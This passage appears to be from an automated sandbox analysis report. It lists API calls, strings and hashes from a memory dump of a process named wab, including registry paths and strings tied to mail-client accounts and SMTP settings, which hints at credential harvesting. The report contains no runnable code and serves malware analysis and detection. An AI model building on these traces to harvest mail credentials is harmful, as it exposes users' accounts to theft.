                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: gj
                      • API String ID: 1297977491-4203073231
                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                      APIs
                      • GetParent.USER32(?), ref: 004090C2
                      • GetWindowRect.USER32(?,?), ref: 004090CF
                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Window$Rect$ClientParentPoints
                      • String ID:
                      • API String ID: 4247780290-0
                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                      APIs
                        • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                        • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                        • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                      • SetBkMode.GDI32(?,00000001), ref: 0041079E
                      • GetSysColor.USER32(00000005), ref: 004107A6
                      • SetBkColor.GDI32(?,00000000), ref: 004107B0
                      • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                      • GetSysColorBrush.USER32(00000005), ref: 004107C6
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                      • String ID:
                      • API String ID: 2775283111-0
                      • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                      • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                      • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                      • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                      APIs
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: winSeekFile$winTruncate1$winTruncate2
                      • API String ID: 885266447-2471937615
                      • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                      • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                      • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                      • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _strcmpi$_mbscpy
                      • String ID: smtp
                      • API String ID: 2625860049-60245459
                      • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                      • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                      APIs
                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                      • memset.MSVCRT ref: 00408258
                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                      Strings
                      • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Close$EnumOpenmemset
                      • String ID: Software\Google\Google Desktop\Mailboxes
                      • API String ID: 2255314230-2212045309
                      • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                      • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                      • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                      • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                      APIs
                      • memset.MSVCRT ref: 0040C28C
                      • SetFocus.USER32(?,?), ref: 0040C314
                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FocusMessagePostmemset
                      • String ID: S_@$l
                      • API String ID: 3436799508-4018740455
                      • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                      • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                      APIs
                      • memset.MSVCRT ref: 004092C0
                      • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                      • _mbscpy.MSVCRT ref: 004092FC
                      Strings
                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: PrivateProfileString_mbscpymemset
                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                      • API String ID: 408644273-3424043681
                      • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                      • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                      • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                      • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscpy
                      • String ID: C^@$X$ini
                      • API String ID: 714388716-917056472
                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                      APIs
                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                      • String ID: MS Sans Serif
                      • API String ID: 3492281209-168460110
                      • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                      • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ClassName_strcmpimemset
                      • String ID: edit
                      • API String ID: 275601554-2167791130
                      • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                      • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: strlen$_mbscat
                      • String ID: 3CD
                      • API String ID: 3951308622-1938365332
                      • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                      • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: rows deleted
                      • API String ID: 2221118986-571615504
                      • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                      • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                      • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                      • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@$memset
                      • String ID:
                      • API String ID: 1860491036-0
                      • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                      • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$memcpy
                      • String ID:
                      • API String ID: 368790112-0
                      • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                      • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                      • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                      • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$memcpy
                      • String ID:
                      • API String ID: 368790112-0
                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                      APIs
                      • __allrem.LIBCMT ref: 00425850
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                      • __allrem.LIBCMT ref: 00425933
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1992179935-0
                      • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                      • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                      • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                      • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                      APIs
                      Strings
                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                      • too many SQL variables, xrefs: 0042C6FD
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                      • API String ID: 2221118986-515162456
                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                      APIs
                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                      • memset.MSVCRT ref: 004026AD
                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                        • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                      • LocalFree.KERNEL32(?), ref: 004027A6
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                      • String ID:
                      • API String ID: 1593657333-0
                      • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                      • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                      • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                      • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                      APIs
                      • memset.MSVCRT ref: 0040C922
                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Message$MenuPostSendStringmemset
                      • String ID:
                      • API String ID: 3798638045-0
                      • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                      • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                      • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                      • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                      APIs
                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                      • strlen.MSVCRT ref: 0040B60B
                      • atoi.MSVCRT ref: 0040B619
                      • _mbsicmp.MSVCRT ref: 0040B66C
                      • _mbsicmp.MSVCRT ref: 0040B67F
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbsicmp$??2@??3@atoistrlen
                      • String ID:
                      • API String ID: 4107816708-0
                      • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                      • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                      • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                      • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                      • String ID:
                      • API String ID: 1886415126-0
                      • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                      • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                      • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                      • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: strlen
                      • String ID: >$>$>
                      • API String ID: 39653677-3911187716
                      • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                      • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                      • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                      • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: @
                      • API String ID: 3510742995-2766056989
                      • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                      • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                      • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                      • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                      APIs
                      • strlen.MSVCRT ref: 0040797A
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                        • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                        • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                      • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                      • memcpy.MSVCRT ref: 004079DD
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@$memcpy$mallocstrlen
                      • String ID:
                      • API String ID: 1171893557-0
                      • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                      • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                      • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                      • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _strcmpi
                      • String ID: C@$mail.identity
                      • API String ID: 1439213657-721921413
                      • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                      • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                      • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                      • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                      APIs
                      • memset.MSVCRT ref: 00406640
                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                        • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                        • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                      • memcmp.MSVCRT ref: 00406672
                      • memcpy.MSVCRT ref: 00406695
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset$memcmp
                      • String ID: Ul@
                      • API String ID: 270934217-715280498
                      • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                      • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                      • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                      • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                      APIs
                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                        • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                      • sprintf.MSVCRT ref: 0040B929
                      • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                      • sprintf.MSVCRT ref: 0040B953
                      • _mbscat.MSVCRT ref: 0040B966
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                      • String ID:
                      • API String ID: 203655857-0
                      • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                      • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                      • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                      • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                      Memory Dump Source
